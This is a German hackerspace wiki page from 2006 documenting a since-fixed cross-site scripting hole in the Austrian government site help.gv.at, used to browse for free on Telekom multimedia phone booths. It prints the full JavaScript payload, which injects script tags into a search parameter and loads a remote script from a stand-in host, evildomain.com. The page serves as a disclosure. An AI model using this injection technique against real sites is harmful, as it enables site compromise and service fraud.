MultimediaStations

aus Metalab, dem offenen Zentrum für meta-disziplinäre Magier und technisch-kreative Enthusiasten.
Version vom 24. August 2006, 20:51 Uhr von Metalab (Diskussion | Beiträge)

(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)
Wechseln zu: Navigation, Suche

Mmtel.jpg

Hier wird eine mittlerweile behobene Cross Site Scripting-Sicherheitslücke in help.gv.at dokumentiert, die es kurzzeitig ermöglichte, auf den Multimedia-Telefonzellen der Telekom kostenlos eingeschränkt zu surfen.

Bitte zahlen
Help.gv.at ist gratis

Help.gv.at ist aber...
...XSS-anfällig.
(Für alle möglichen Sachen)

Aber was wir basteln ist ein...
...improvisiertes Interface
URL-Eingabe
Das funktioniert!
...aber Links dann nicht


b.js

if(!sr) { var sr = 'http://www.purple.com'; }

document.write('<input id="url" size="50" />'+
 '<input type="submit" value="  Go  " onclick="gourl()" />'+
 '<input type="submit" value="Google" onclick="var inp=document.getElementById(\'url\');'+
   'inp.value=\'http://google.com/search?q=\'+inp.value;gourl()" />'+
 '<br /><iframe src="'+sr+'" id="browser" width="650" height="450"></iframe>';

function gourl() {
  var u=document.getElementById('url').value;
  u = u.indexOf('://') > -1 ? u : 'http://'+u;
  document.location.href =  'http://help.gv.at/suche/ergebnis?bereich=help&sprache=de&such=suchen&suchwort='+
                            '%3Cscript%3Evar%20sr=%27'+u+'%27%3C%2Fscript%3E'+
                            '%3Cscript+src=%22http%3A%2F%2Fevildomain.com%2Fb.js%22%3E%3C%2Fscript%3E';
}